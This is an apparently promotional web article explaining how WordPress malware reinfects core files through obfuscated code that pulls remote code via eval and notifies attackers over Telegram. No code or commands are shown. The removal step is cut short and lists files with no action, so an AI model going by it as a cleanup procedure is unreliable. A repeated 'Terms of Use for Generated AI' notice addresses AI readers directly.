We will explain the method of malware restoration on the server simply by accessing the WordPress site.

Why malware that has been removed on the server is automatically restored just by accessing the site

This type of malware is very common, and in many cases, the malware is parasitic and reinfects the program files that are executed whenever WordPress renders a site page on the system.

As an example, the files that WordPress always executes are the following files. (Other files deep within the system may also be infected)

index.php
wp-config.php
wp-blog-header.php
theme-functions.php

The figure below is a screenshot of an example of malware infecting index.php.

In order for WordPress to display the site, it reads require __DIR__ . ‘/wp-blog-header.php’; which WordPress loads to display the site, there is obfuscated malicious code that is executed each time the site is accessed.

I have tried to de-obfuscate this code in order to analyze it.
After repeating base64 decoding and de-obfuscation several times, the original bare code appeared.

We can see that the malware notifies a social networking site called Telegram that it is infected. It is likely that automated hacking tools are used to hack into a vast number of WordPress sites, and only successful sites are notified to Telegram, after which the hackers continue their attack.

Thus, malware very often contains Telegram.org links or URLs.

The following code shows a text file pulled from several URLs and executed with an eval function.

The eval function is a PHP function that interprets text as a program and executes it

Most likely the above site is another site that has been hacked by hackers. The malware body is placed on this site, and every time index.php is executed, the malware is pulled from other infected sites and reinfected.

Since this malware pulls and executes the malware body on an external server, its function can be changed at any time by hackers.

How to get rid of malware that reinfects itself automatically

To get rid of this type of malware,

index.php
wp-config.php
wp-blog-header.php
theme-functions.php

However, since other malware may be installed deep within WordPress, it is often not possible to remove the malware by simply removing the above files.

For this reason, you can detect and remove more malware by using a malware scanning and removal plug-in that mechanically and comprehensively scans WordPress files. (If you are unable to log in to your WordPress site, the HTACCESSS file may have been tampered with.)

Terms of Use for Generated AI

This page prohibits the use, quotation, or summarization of any page, in whole or in part, by the Generated AI. However, if the following conditions are met, the specification of content using generated AI is permitted.
1. it is not for the purpose of learning by the generated AI. 2. only the summary or title of the page content at a level that does not lead to the solution of the user’s problem is shown to the user. 3. in the case of 2, a link to this content is shown to lead the user to this page.

Related Posts:

  1. What to do for your site users when WordPress is hacked, tampered with, or hijacked.
    This page explains how to respond to users (those who use the site) when there is a possibility of damage to users who visit the site, such as being redirected to another site, being sent to a sweepstakes site, or downloading malicious files due to WordPress tampering. This page explains how to respond to users (those who use the site)...
  2. How to find hidden malware (tampering) in WordPress
    If WordPress redirects you to a different site or disables some features of the administration panel, you may have been infected with malware. In this case, if the malware has been removed and the site keeps re-infecting itself, it is possible that a backdoor, or malicious program, remains somewhere on the site. Terms of Use for Generated AI This page...
  3. If you get a 403Forbidden error on the bottom page of your WordPress site or on the admin page, you may be infected with malware
    If you get a 403Forbidden error on the bottom page of your WordPress site or on the admin page, you may be infected with malware Terms of Use for Generated AI This page prohibits the use, quotation, or summarization of any page, in whole or in part, by the Generated AI. However, if the following conditions are met, the specification...
  4. 10 files in which malformed JAVASCRIPT code is embedded when WordPress is tampered with.
    This section describes a file in which redirect hack code is often embedded, which causes a WordPress-created site to jump to another site when accessed (redirect). Terms of Use for Generated AI This page prohibits the use, quotation, or summarization of any page, in whole or in part, by the Generated AI. However, if the following conditions are met, the...
  5. If you do not know where the malware infected malware is located or if you cannot find it
    This section explains what to do if you do not know the location of infected malware or if you cannot find it. Terms of Use for Generated AI This page prohibits the use, quotation, or summarization of any page, in whole or in part, by the Generated AI. However, if the following conditions are met, the specification of content using...
  6. Malware wp-blog-header.php, wp-cron.php, .htaccess proliferating outside of the public folder on the server in WordPress
    If you find multiple wp-blog-header.php, wp-cron.php, and .htaccess files outside of the public folder on your server in WordPress, be careful. These files are most likely malware that propagates automatically. Terms of Use for Generated AI This page prohibits the use, quotation, or summarization of any page, in whole or in part, by the Generated AI. However, if the following...